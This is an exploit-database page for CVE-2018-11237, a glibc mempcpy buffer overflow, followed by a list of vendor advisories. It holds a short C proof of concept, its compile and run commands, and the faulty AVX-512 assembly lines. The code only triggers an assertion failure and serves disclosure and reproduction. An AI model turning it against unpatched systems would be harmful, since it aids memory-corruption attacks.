Lucene search
JameelNabbo1337DAY-ID-30437HistoryMay 24, 2018 - 12:00 a.m.
glibc 2.27 #GNU - Local Buffer Overflow Exploit
2018-05-2400:00:00
JameelNabbo
0day.today
39
0.001 Low
EPSS
Percentile
21.1%
Exploit for linux platform in category local exploits
# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage: http://www.gnu.org/ <http://www.gnu.org/>
# CVE: CVE-2018-11237
# POC:
$ cat mempcpy.c
#define _GNU_SOURCE 1
#include <string.h>
#include <assert.h>
#define N 97699
char a[N];
char b[N+128];
int
main (void)
{
memset (a, 'x', N);
char *c = mempcpy (b, a, N);
assert (*c == 0);
}
$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy
$ ./mempcpy
mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed.
The problem is these two lines in memmove-avx512-no-vzeroupper.S:
vmovups %zmm4, (%rax)
vmovups %zmm5, 0x40(%rax)
For mempcpy, %rax points to the end of the buffer.
# 0day.today [2018-05-24] #Related
nessus
nessus
Fedora 27 : glibc (2018-c1ef35a4f9)
2018-09-10 00:00:00
Fedora 28 : glibc (2018-916dfe0d86)
2019-01-03 00:00:00
Amazon Linux 2 : glibc (ALAS-2018-1131)
2018-12-20 00:00:00
prion
prion
Buffer overflow
2018-05-18 16:29:00
exploitdb
exploitdb
GNU glibc < 2.27 - Local Buffer Overflow
2018-05-24 00:00:00
redhatcve
redhatcve
CVE-2018-11237
2019-12-27 09:29:31
fedora
fedora
[SECURITY] Fedora 28 Update: glibc-2.27-15.fc28
2018-05-27 19:33:21
[SECURITY] Fedora 28 Update: glibc-2.27-35.fc28
2018-12-04 02:24:24
[SECURITY] Fedora 27 Update: glibc-2.26-30.fc27
2018-09-07 15:25:49
suse
suse
Security update for glibc (moderate)
2018-06-09 15:13:28
Security update for glibc (moderate)
2018-08-01 18:08:08
Security update for glibc (important)
2018-06-08 00:15:00
veracode
veracode
Buffer Overflow
2019-05-16 03:18:40
openvas
openvas
Fedora Update for glibc FEDORA-2018-916dfe0d86
2018-05-28 00:00:00
openSUSE: Security Advisory for glibc (openSUSE-SU-2018:1633-1)
2018-10-26 00:00:00
openSUSE: Security Advisory for glibc (openSUSE-SU-2018:2159-1)
2018-10-26 00:00:00
debiancve
debiancve
CVE-2018-11237
2018-05-18 16:29:00
ibm
ibm
Security Bulletin: IBM QRadar SIEM is vulnerable to publicly disclosed vulnerability from GNU glibc (CVE-2018-11237)
2019-03-05 18:25:02
Security Bulletin: IBM QRadar Network Packet Capture is vulnerable to a Publicly disclosed vulnerability from GNU glibc (CVE-2018-11237)
2019-04-17 16:55:01
Security Bulletin: Vulnerabiliies in glibc affect PowerKVM
2019-03-04 05:55:02
cve
cve
CVE-2018-11237
2018-05-18 16:29:00
osv
osv
CVE-2018-11237
2018-05-18 16:29:00
ubuntucve
ubuntucve
CVE-2018-11237
2018-05-18 00:00:00
amazon
amazon
Medium: glibc
2018-12-17 19:13:00
Medium: glibc
2018-12-06 00:24:00
packetstorm
packetstorm
GNU glibc Local Buffer Overflow
2018-05-24 00:00:00
f5
f5
K35981055 : glibc vulnerability CVE-2018-11237
2018-06-29 00:00:00
photon
photon
oraclelinux
oraclelinux
glibc security, bug fix, and enhancement update
2018-11-05 00:00:00
glibc security update
2018-11-06 00:00:00
redhat
redhat
(RHSA-2018:3092) Moderate: glibc security, bug fix, and enhancement update
2018-10-30 04:18:01
centos
centos
glibc, nscd security update
2018-11-15 18:45:43
ubuntu
ubuntu
GNU C Library vulnerabilities
2020-07-06 00:00:00
cloudfoundry
cloudfoundry
USN-4416-1: GNU C Library vulnerabilities | Cloud Foundry
2020-08-27 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - April 2019
2019-04-16 00:00:00